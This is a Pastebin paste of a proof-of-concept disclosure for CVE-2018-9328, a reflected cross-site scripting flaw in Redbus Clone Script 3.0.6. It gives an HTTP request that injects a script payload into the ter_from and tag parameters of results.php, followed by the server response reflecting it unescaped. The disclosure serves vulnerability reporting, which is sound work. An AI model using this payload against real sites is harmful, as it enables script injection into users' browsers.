SHARE
TWEET

CVE-2018-9328

ManhNho Apr 5th, 2018 (edited) 627 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Exploit Title: Redbus Clone Script 3.0.6 - Cross-Site Scripting
  2. # Date: 22.03.2018
  3. # Vendor Homepage: https://www.phpscriptsmall.com/
  4. # Software Link: https://www.phpscriptsmall.com/product/redbus-clone/
  5. # Category: Web Application
  6. # Exploit Author: ManhNho
  7. # Version: 3.0.6
  8. # CVE: CVE-2018-9328
  9. # Tested on: Window 10
  10.  
  11. PoC
  12. --------------------------------------------------------------
  13. Request:
  14.  
  15. GET /~materialmag/demo/redbus-clone-responsive/results.php?triptype=1&ter_from=%27);%3Cscript%3Ealert(%221%22);%3C/script%3E&tag=%27);%3Cscript%3Ealert(%221%22);%3C/script%3E&datepicker=23-03-2018&datepicker1=&type=bus HTTP/1.1
  16. Host: <Target>
  17. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
  18. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  19. Accept-Language: en-GB,en;q=0.5
  20. Accept-Encoding: gzip, deflate
  21. Cookie: PHPSESSID=a26646fb257df1e606dbd65bbb67cfa2
  22. Connection: close
  23. Upgrade-Insecure-Requests: 1
  24.  
  25. --------------------------------------------------------------
  26. Response:
  27.  
  28. HTTP/1.1 200 OK
  29. Date: Thu, 22 Mar 2018 09:48:34 GMT
  30. Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
  31. X-Powered-By: PHP/5.4.45
  32. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  33. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  34. Pragma: no-cache
  35. Connection: close
  36. Content-Type: text/html
  37. Content-Length: 48308
  38. ...
  39. <div  class="row" style="background-color: #435255; color: #fff; padding: 10px 10px 0px 10px;">
  40.  <div class="container text-center" >
  41.     <div class="col-md-1"><button style="margin-bottom: 10px;" type="button" onclick="change_val();" class="btn btn-danger">Modify</button></div>
  42.     <div class="col-md-5" style="border-right: solid 1px #ccc; margin-bottom: 10px;">
  43.         <span  style="font-size:14px; color:#fff; "> <strong>Journey Date</strong> </span>
  44.         <span ><a href="results.php?ter_from=');<script>alert("1");</script>&tag=');<script>alert("1");</script>&datepicker=23-03-2018&backward"><img src="images/bef.JPG" width="24" height="24"/></a></span>
  45.         <span style="font-size:12px; color:#fff; vertical-align:center;">23-03-2018</span>
  46.         <span> <a href="results.php?ter_from=');<script>alert("1");</script>&tag=');<script>alert("1");</script>&datepicker=23-03-2018&forward"><img src="images/aft.JPG" width="24" height="24"/></a> </span>
  47.     </div>
  48.     <div class="col-md-6"></div>
  49.  </div>
  50. </div>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top